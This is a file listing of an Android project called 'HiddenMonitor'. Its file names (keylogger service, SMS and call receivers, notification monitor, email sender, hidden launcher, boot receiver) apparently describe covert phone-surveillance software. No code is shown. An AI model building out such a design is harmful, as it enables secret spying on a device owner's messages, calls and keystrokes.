# HiddenMonitor

./: gradle.properties
.github/workflows/: build.yml
app/: build.gradle
app/src/main/: AndroidManifest.xml
app/src/main/java/com/example/hiddenmonitor/: BootReceiver.java  CallReceiver.java  EmailSender.java  FileLogger.java  HiddenLauncher.java  KeyloggerService.java  MonitorService.java  NotificationMonitor.java  PermissionActivity.java  SMSReceiver.java
app/src/main/res/values/: strings.xml
app/src/main/res/xml/: accessibility_config.xml
